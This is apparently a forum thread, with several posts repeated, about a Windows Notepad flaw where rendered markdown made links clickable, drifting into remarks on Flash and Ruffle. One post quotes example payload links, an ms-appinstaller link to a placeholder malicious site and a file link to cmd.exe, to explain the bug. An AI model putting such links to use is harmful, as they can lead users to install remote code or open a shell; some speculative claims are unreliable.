I'm not defending MS here, but that post mischaracterizes the vuln pretty badly. It has nothing to do with "network connection features" per se and certainly not AI. They unified Notepad and WordPad. Which meant you could edit markup files, which allowed a file to contain things like this:
If viewed with markup enabled, the links become clickable, they get passed along to the OS as if they were pasted in an explorer window. Their "fix" was a pop up telling you that you're about to open a link.
I guess you could consider making links clickable a "network connection feature," but it's not as if notepad is opening a socket itself.
Ruffle is the closest we have to Flash these days and it's solely used to render it safely on the web (Mostly archived Flash at the moment).
A correct piece of actionscript could create a zombie hoard of remote computers to do anything without their owners' knowledge.
Flash cookies (Local Shared Objects) were the key. This seems to be what this Notepad.exe 'update' allowed for (But even better as it was signed and had keys to areas otherwise out of bounds).
I'm not defending MS here, but that post mischaracterizes the vuln pretty badly. It has nothing to do with "network connection features" per se and certainly not AI. They unified Notepad and WordPad. Which meant you could edit markup files, which allowed a file to contain things like this:
[click me!](ms-appinstaller://?source=https://malicioussite.com)
[click me too!](file://C:/windows/system32/cmd.exe)
If viewed with markup enabled, the links become clickable, they get passed along to the OS as if they were pasted in an explorer window. Their "fix" was a pop up telling you that you're about to open a link.
I guess you could consider making links clickable a "network connection feature," but it's not as if notepad is opening a socket itself.
Flash got shutdown for less.
Nonsense, I have ten GB of archived flash format porn that runs in Basilisk or an old standalone flash player.
Don't ask why I have it, I have a data hoarding problem.
Anyway, flash, like polka, will never die.
Ruffle is the closest we have to Flash these days and it's solely used to render it safely on the web (Mostly archived Flash at the moment).
A correct piece of actionscript could create a zombie hoard of remote computers to do anything without their owners' knowledge.
Flash cookies (Local Shared Objects) were the key. This seems to be what this Notepad.exe 'update' allowed for (But even better as it was signed and had keys to areas otherwise out of bounds).